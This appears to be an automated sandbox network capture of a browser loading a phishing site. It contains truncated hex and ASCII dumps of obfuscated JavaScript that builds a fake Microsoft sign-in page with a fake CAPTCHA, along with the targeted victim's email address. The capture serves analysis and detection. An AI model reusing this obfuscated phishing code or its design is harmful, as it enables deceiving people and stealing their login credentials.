                                                        2025-01-12 00:24:51 UTC1378INData Raw: 33 51 67 5a 6e 4a 76 62 53 42 30 61 47 55 67 63 33 42 6c 59 32 6c 6d 61 57 56 6b 49 48 42 68 64 47 67 4e 43 6d 46 7a 65 57 35 6a 49 47 5a 31 62 6d 4e 30 61 57 39 75 49 47 78 76 59 57 52 46 62 57 46 70 62 45 78 70 63 33 51 6f 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 48 56 7a 5a 56 5a 6c 63 6d 6c 6d 61 57 56 6b 52 57 31 68 61 57 78 4d 61 58 4e 30 49 44 30 39 50 53 41 78 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 52 79 65 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 49 47 46 33 59 57 6c 30 49 47 5a 6c 64 47 4e 6f 4b 47 56 74 59 57 6c 73 54 47 6c 7a 64 46 42 68 64 47 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 43 46 79
                                                        Data Ascii: 3QgZnJvbSB0aGUgc3BlY2lmaWVkIHBhdGgNCmFzeW5jIGZ1bmN0aW9uIGxvYWRFbWFpbExpc3QoKSB7DQogICAgaWYgKHVzZVZlcmlmaWVkRW1haWxMaXN0ID09PSAxKSB7DQogICAgICAgIHRyeSB7DQogICAgICAgICAgICBjb25zdCByZXNwb25zZSA9IGF3YWl0IGZldGNoKGVtYWlsTGlzdFBhdGgpOw0KICAgICAgICAgICAgaWYgKCFy


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.64980172.167.84.164431444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-12 00:25:06 UTC811OUTGET /m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.co HTTP/1.1
                                                        Host: militarplus.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://procustodiavalueslive.github.io/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-01-12 00:25:07 UTC234INHTTP/1.1 200 OK
                                                        Date: Sun, 12 Jan 2025 00:25:07 GMT
                                                        Server: Apache
                                                        X-Powered-By: PHP/8.1.31
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Vary: Accept-Encoding
                                                        Transfer-Encoding: chunked
                                                        Content-Type: text/html; charset=UTF-8
                                                        2025-01-12 00:25:07 UTC393INData Raw: 31 37 64 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 52 54 52 4e 56 45 56 35 54 55 52 4a 4d 46 5a 55 54 58 64 4e 56 45 56 34 54 30 52 42 4e 41 3d 3d 27 20 76 69 63 3d 27 68 64 37 71 79 64 40 76 6e 6a 6c 61 2e 63 6f 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b
                                                        Data Ascii: 17d<!DOCTYPE html><html id='html' sti='VlZORlVqRTRNVEV5TURJMFZUTXdNVEV4T0RBNA==' vic='hd7qyd@vnjla.co' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVK


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.64980072.167.84.164431444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-12 00:25:07 UTC621OUTGET /m/jsnom.js HTTP/1.1
                                                        Host: militarplus.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://militarplus.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVQwUkVWM2s9JnVpZD1VU0VSMTgxMTIwMjRVMzAxMTE4MDg=N0123Nhd7qyd@vnjla.co
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-01-12 00:25:07 UTC299INHTTP/1.1 200 OK
                                                        Date: Sun, 12 Jan 2025 00:25:07 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Wed, 11 Dec 2024 03:04:40 GMT
                                                        ETag: "1002a2-18781-628f5dbda9819"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 100225
                                                        Vary: Accept-Encoding
                                                        Content-Type: text/javascript
                                                        2025-01-12 00:25:07 UTC7893INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                                        Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                                        2025-01-12 00:25:07 UTC8000INData Raw: 74 69 6f 6e 3a 5c 78 32 30 61 62 73 6f 6c 75 74 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30
                                                        Data Ascii: tion:\x20absolute;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x200%;\x0a\x20\x20\x20
                                                        2025-01-12 00:25:07 UTC8000INData Raw: 5c 78 32 30 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 2d 69 6e 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 72 67 62 28 32 35 35 2c 5c 78 32 30 32 35 35 2c 5c 78 32 30 32 35 35 29 2c 5c
                                                        Data Ascii: \x20letter-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20-internal-light-dark(rgb(255,\x20255,\x20255),\
                                                        2025-01-12 00:25:07 UTC8000INData Raw: 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30
                                                        Data Ascii: a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20
                                                        2025-01-12 00:25:07 UTC8000INData Raw: 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c
                                                        Data Ascii: s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.dot-floating::after\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20l
                                                        2025-01-12 00:25:07 UTC8000INData Raw: 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f
                                                        Data Ascii: 0a\x20\x20\x20\x20.checkbox-wrapper-43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.checkbo
                                                        2025-01-12 00:25:07 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 62 6c 6f 63 6b 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 69 64 65 42 61 72 3e 69 6d 67 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                        Data Ascii: \x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20display:\x20block;\x0a\x20\x20\x20\x20\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x20\x20\x20\x20.sideBar>img\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x2010px;\x0a\x20\x20\x20\x20\x20\x20\x2
                                                        2025-01-12 00:25:07 UTC8000INData Raw: 32 5c 78 32 30 72 6f 6c 65 3d 5c 78 32 32 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 78 32 32 5c 78 32 30 70 6e 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 37 63 63 30 39 36 64 61 36 61 61 32 64 62 61 33 66 38 31 66 63 63 31 63 38 32 36 32 31 35 37 63 2e 70 6e 67 5c 78 32 32 5c 78 32 30 73 76 67 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38
                                                        Data Ascii: 2\x20role=\x22presentation\x22\x20pngsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png\x22\x20svgsrc=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8
                                                        2025-01-12 00:25:07 UTC8000INData Raw: 5c 78 32 32 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 61 74 61 2d 62 69 6e 64 3d 5c 78 32 32 69 6d 67 53 72 63 5c 78 32 32 5c 78 32 30 73 72 63 3d 5c 78 32 32 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                        Data Ascii: \x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20data-bind=\x22imgSrc\x22\x20src=\x22https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\x22>\x0a\x20\x20\x20\x20\x20\
                                                        2025-01-12 00:25:07 UTC8000INData Raw: 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 3c 69 6e 70 75 74 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5c 78 32 32 3e 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 72 65 63 61 70 74 63 68 61 73 75 62 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32
                                                        Data Ascii: x20\x20\x20\x20\x20\x20...\x20<input\x20class=\x22recaptchacheckbox\x22\x20type=\x22checkbox\x22\x20name=\x22\x22\x20id=\x22\x22>\x20-->\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22recaptchasub\x22>\x0a\x20\x20\x2


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.64980918.245.31.334431444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-12 00:25:07 UTC564OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                        Host: cdn.socket.io
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://militarplus.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://militarplus.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-01-12 00:25:08 UTC703INHTTP/1.1 200 OK
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Content-Length: 49993
                                                        Connection: close
                                                        Accept-Ranges: bytes
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=31536000, immutable
                                                        Content-Disposition: inline; filename="socket.io.min.js"
                                                        Date: Sat, 03 Aug 2024 07:26:50 GMT
                                                        ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                        Server: Vercel
                                                        Strict-Transport-Security: max-age=63072000
                                                        X-Vercel-Cache: HIT
                                                        X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 37236193bd380575cb98e661bedbb260.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: FRA56-P8
                                                        X-Amz-Cf-Id: DqO9Bk6XdZ8oBMQGla9a8chfOd405iqhjABG1NICX8r_UYMdCHrFUg==
                                                        Age: 14348899
                                                        2025-01-12 00:25:08 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                        Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                        2025-01-12 00:25:08 UTC16384INData Raw: 66 20 64 6f 63 75 6d 65 6e 74 29 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 74 74 61 63 68 45 76 65 6e 74 29 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 61 65 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 6e 70 61 67 65 68 69 64 65 22 69 6e 20 49 3f 22 70 61 67 65 68 69 64 65 22 3a 22 75 6e 6c 6f 61 64 22 2c 61 65 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 61 65 28 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 73 65 2e 72 65 71 75 65 73 74 73 29 73 65 2e 72 65 71 75 65 73 74 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 73 65 2e 72 65 71 75
                                                        Data Ascii: f document)if("function"==typeof attachEvent)attachEvent("onunload",ae);else if("function"==typeof addEventListener){addEventListener("onpagehide"in I?"pagehide":"unload",ae,!1)}function ae(){for(var e in se.requests)se.requests.hasOwnProperty(e)&&se.requ
                                                        2025-01-12 00:25:08 UTC16384INData Raw: 74 61 20 77 68 65 6e 20 72 65 63 6f 6e 73 74 72 75 63 74 69 6e 67 20 61 20 70 61 63 6b 65 74 22 29 3b 76 61 72 20 6e 3d 28 74 3d 74 68 69 73 2e 64 65 63 6f 64 65 53 74 72 69 6e 67 28 65 29 29 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 3b 6e 7c 7c 74 2e 74 79 70 65 3d 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 3f 28 74 2e 74 79 70 65 3d 6e 3f 42 65 2e 45 56 45 4e 54 3a 42 65 2e 41 43 4b 2c 74 68 69 73 2e 72 65 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6e 65 77 20 50 65 28 74 29 2c 30 3d 3d 3d 74 2e 61 74 74 61 63 68 6d 65 6e 74 73 26 26 70 28 73 28 69 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 65 6d 69 74 52 65 73 65 72 76 65 64 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 2c 22 64 65 63 6f 64 65 64 22 2c 74 29 29 3a 70 28 73 28 69
                                                        Data Ascii: ta when reconstructing a packet");var n=(t=this.decodeString(e)).type===Be.BINARY_EVENT;n||t.type===Be.BINARY_ACK?(t.type=n?Be.EVENT:Be.ACK,this.reconstructor=new Pe(t),0===t.attachments&&p(s(i.prototype),"emitReserved",this).call(this,"decoded",t)):p(s(i
